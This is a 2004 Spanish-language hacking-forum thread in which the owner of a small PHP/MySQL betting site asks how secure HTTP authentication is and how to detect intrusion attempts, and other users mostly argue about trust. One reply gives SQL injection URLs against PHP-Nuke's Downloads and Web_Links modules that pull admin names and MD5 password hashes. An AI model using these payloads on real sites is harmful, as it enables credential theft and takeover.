Miedo de inseguridad en mi página web

Versión para imprimir

08-04-2004, 15:36
Nuismi

Miedo de inseguridad en mi página web

Me da un poco de miedo poner aquí la dirección de la página que tengo porque entre tanto experto temo que haya alguien que me la hackee con fines maliciosos (que nadie lo tome a mal).
Es una web de quinielas en la que los socios tienen una cuenta con su saldo para jugar y no me gustaría que alguien entrara y modificara el saldo a su favor, o cualquier otro dato de otro socio.
Está alojada en un servidor Apache para Windows, programada con PHP y basada en MySQL
Como Administrador accedo a todos los servicios por medio del típico $PHP_AUTH_USER y $PHP_AUTH_PW y me gustaría saber si es facil o no romper esta seguridad, en cuyo caso
COMO PUEDO AVERIGUAR SI HAY INTENTOS DE HACKEO?
Si existe algún programa que me avise o loguee cuando se prueben passwords diferentes, por ejemplo?
Gracias por vuestra colaboración y un saludo desde Zaragoza
09-04-2004, 01:02
unholy

No te lo tomes a mal Nuismi, pero resulta que nos estas diciendo que no te fias de nosotros, pero sin embargo nos pides ayuda????.... la verdad es que no creo que asi llegues muy lejos...

En cualquier caso, si necesitas ayuda para saber como esta hecho tu web, se necesita saber la forma de atacar la base de datos, los mecanismos de seguridad que has implementado, si tienes implmenetados metodos de traceo a los usuarios, malformacion de url's... es decir todo....

Por ejemplo, con ASP puedes tener una pagina que sea una mierda y cueste reventarla 2 minutos, o bien puede ser la ostia y ser imposible de romperla....
09-04-2004, 14:02
leroteje

Nuismi!!

Ten en cuenta que los que estamos aquí dentro, en mi opinión somos buena gente, y no vamos a ir a joderte la página porque la hayas puesto en un post.

Y es más, deberías de proponer que te la hackearan, porque es así donde podrías ver si tiene fallos, y de ese modo solventarlos.

(así es como los mejores programadores aprenden, dandoles los programas a otros para que intenten "petarlos")

Esta es mi opinión!!

Saludos!!
10-04-2004, 03:55
Nuismi

Bueno, me parece que no habéis entendido lo que he dicho de que nadie se lo tome a mal, pero por si acaso vuelvo a decirlo. Que nadie se de por aludido.
Una cosa es que un experto hacker que tiene una cierta reputación, como muchos de vosotros lo sois, pueda aconsejarme habiendo él mismo visitado la web y otra que diga claramente o rete a cualquiera a penetrar un sistema.
Podría fiarme de un avanzado hacker e invitarlo a hacer pruebas o incluso a darle las llaves de todo el sistema, siempre que me ayude a mejorar la seguridad del mismo, pero no voy a publicar la dirección en un foro donde todos, los "buenos" y los "malos", van a intentar hacerlo, y cada uno con fines completamente diferentes.
Creo que me he explicado.
Cuando he hecho la web no pensaba en problemas de seguridad, sencillamente intentaba hacer un sitio donde unos amigos pudieran validar sus apuestas y he puesto un control de acceso que me parece algo rudimentario, y no me gustaría que todo se viniera al traste porque algún malintencionado se colara haciendo de las suyas. De ahí mi pregunta, si el tipo de control de autentificación del PHP es o no fiable, guardando las claves en una base de datos MySQL, ni más ni menos.
Me he comprado una caja fuerte de marca ACME, mi pregunta es "es fiable?" No voy a deciros a todos dónde está, ni invitaros a todos a reventarla.
Supongo que me habréis entendido.
Si alguno se siente ofendido, no era mi intención y le pido disculpas.
Gracias
10-04-2004, 23:43
diarrea

Joer imaginate q el malintencionado se mete en google y pone "quinielas" y empieza a breakar todos los sites q encuentre xDDD no hombre pero es q como dice unholy se necesita informacion especifica de como esta hecha la web, no vale lo de "programada con PHP y basada en MySQ".
GreetingZ :0=
18-04-2004, 19:13
leroteje

De todas formas te comento una cosa!!

El otro día un amigo me comento algo parecido, y me digo que otro amigo suyo que controlaba de php y mysql, le conseguia todas las contraseñas que quería.

Así que esto es como todo, nada es seguro, y si dices tú que no te preocupaste mucho por la seguridad, pues hijo, pega un repaso, porque seguramente no sea muy segura!!

Saludos!
18-04-2004, 21:32
clarinetista

Mas seguridad tenia bankinter...
19-04-2004, 01:10
leroteje

Cita:

Mas seguridad tenia bankinter...

Ein?? bankinter??

No lo pillo!!
19-04-2004, 23:45
clarinetista

Esperate, que igual me he chinao.
¿No era un ruso que entro en bankinter con un ordenata que le costo 2000 rublos y una botella de vodka?
Me parece recordar que era Bankinter
20-04-2004, 01:00
leroteje

Pues no se, no tengo ni idea!!
No sabia yo nada de eso!!
Jejejeje!!

Pero puede ser!! Voy a buscar a ver!!
Saludos!!
20-04-2004, 17:50
aerial25

Pues creo que esta de mas decir que me ha caido muy mal lo que has dicho... si no te fias de nosotros para que te registras??' por que pides ayuda si no confias en el foro?? entiende que el hecho de que este sea un foro hacker, no significa kqueandemos por ahi hackeando y metiendonos en paginas por pura maldad u ocio... todo lo contrario...
Lee las normas del foro antes de hacer comentarios de este tipo...
Ademas y a riesgo de caer antipatico ante los demás, nosotros bien podríamos no fiarnos de tus intenciones... y si lo que quieres es conocer una manera de entrar a una web que no es tuya??? o saber como buscar agujeros'??? se invertirían los papeles no???
Piensa mejor lo que posteaspara la proxima vez por favor..
21-04-2004, 00:18
clarinetista

La verdad es que eso que comentas aerial25 me choca un poco. Que hay gente que pregunta una cosa y no se le vuelve a ver el pelo por aqui, y otros lo hacemos para quedarnos.
Me da un poco de pena el chaval, ya que su intencion seguro que era buena, pero seguro que ha leido una revista estupida de super hacker malos malosos y se ha pensao cosas raras.
Yo no pongo mi pagina aqui por no hacerme publicidad, pero la verdad es que a lo mejor el chaval esta nervioso(yo no tengo problemas,ya que es lo que dice diarrea, google lo ve todo).
No se, a lo mejor(es muy,muy probable) que este divagando, pero entiendo por ejemplo que el gachó no tiene por que fiarse de mi por ejemplo, ahora, nada le obliga a registrarse o sea que no se.
Bueno, chaval en resumen, yo pienso que si quieres ayuda no es la mejor forma de pedirla.

PD: Alguien que me confirme lo del ruso.
17-07-2004, 12:12
welvis30

weno mira, por ponerte algo, puede k te saken el password encriptado cn md5 y despues desencriptarlo. como se saca? con una inyeccion en la url, x ejemplo si tenes activado las descargas, con este xploit /modules.php?name=Downloads&d_op=viewdownload&cid=2 %20UNION%20select%20counter,%20aid,%20pwd%20FROM%2 0nuke_authors%20.... te saldra el administrador y el pass, eso si no lo tenes protegido, weno si tienes el modulo de weblinks abierto:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20aid,%20pwd%20FROM%20nuk e_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20U NION%20select%20counter,%20pwd,%20aid%20FROM%20nuk e_authors%20

PD: pruebate a ver
19-07-2004, 13:31
etirini17

de a cuerdo con los chicos

porque no te asocias en la pagina de Dysnelandia y posteas esa pregunta ahi....no creo que haya tantos hackers dando vueltas por ahi (ni tantas respuestas....) a menos que mickey......
Mejor confia en ellos, son buenos chicos (aunque a veces esten cabreados....jajajaja) :) :rolleyes: :0= :0=